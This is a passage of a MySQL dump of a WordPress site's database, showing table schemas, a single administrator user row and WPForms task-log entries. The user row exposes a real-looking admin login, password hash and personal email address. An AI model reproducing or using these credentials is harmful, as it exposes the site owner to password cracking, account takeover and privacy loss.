  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_users`
--

LOCK TABLES `wpii_users` WRITE;
/*!40000 ALTER TABLE `wpii_users` DISABLE KEYS */;
INSERT INTO `wpii_users` VALUES (1,'xxx9admin','$P$Bl.t8vtCbKK9KbX930GTTzkgZizDk..','xxx9admin','sam@samdemma.com','http://highperformingstudent.com','2020-10-28 12:21:43','',0,'xxx9admin');
/*!40000 ALTER TABLE `wpii_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_wpforms_lite`
--

DROP TABLE IF EXISTS `wpii_wpforms_lite`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_wpforms_lite` (
  `rid` int(10) NOT NULL AUTO_INCREMENT,
  `start` bigint(20) NOT NULL,
  `end` bigint(20) NOT NULL,
  `status` tinyint(2) NOT NULL DEFAULT 1,
  `date` int(10) NOT NULL,
  PRIMARY KEY (`rid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_wpforms_lite`
--

LOCK TABLES `wpii_wpforms_lite` WRITE;
/*!40000 ALTER TABLE `wpii_wpforms_lite` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_wpforms_lite` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_wpforms_tasks_meta`
--

DROP TABLE IF EXISTS `wpii_wpforms_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_wpforms_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `data` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_wpforms_tasks_meta`
--

LOCK TABLES `wpii_wpforms_tasks_meta` WRITE;
/*!40000 ALTER TABLE `wpii_wpforms_tasks_meta` DISABLE KEYS */;
INSERT INTO `wpii_wpforms_tasks_meta` VALUES (1,'wpforms_process_entry_emails_meta_cleanup','Wzg2NDAwXQ==','2020-10-28 12:29:29'),(2,'wpforms_admin_notifications_update','W10=','2020-10-28 12:31:03'),(3,'wpforms_builder_help_cache_update','W10=','2020-10-29 00:22:52'),(4,'wpforms_admin_notifications_update','W10=','2020-10-29 17:02:48'),(5,'wpforms_admin_notifications_update','W10=','2020-11-06 01:18:02'),(6,'wpforms_admin_notifications_update','W10=','2020-11-11 17:54:52'),(7,'wpforms_admin_notifications_update','W10=','2020-12-03 21:16:59'),(8,'wpforms_admin_notifications_update','W10=','2020-12-03 21:17:39'),(9,'wpforms_admin_notifications_update','W10=','2021-02-01 01:33:03'),(10,'wpforms_admin_notifications_update','W10=','2021-02-01 01:33:45'),(11,'wpforms_admin_notifications_update','W10=','2021-02-03 01:55:08'),(12,'wpforms_admin_notifications_update','W10=','2021-02-05 17:38:26'),(13,'wpforms_admin_notifications_update','W10=','2021-02-08 17:10:36'),(14,'wpforms_admin_notifications_update','W10=','2021-02-10 13:43:53');
/*!40000 ALTER TABLE `wpii_wpforms_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2021-04-18 18:32:21
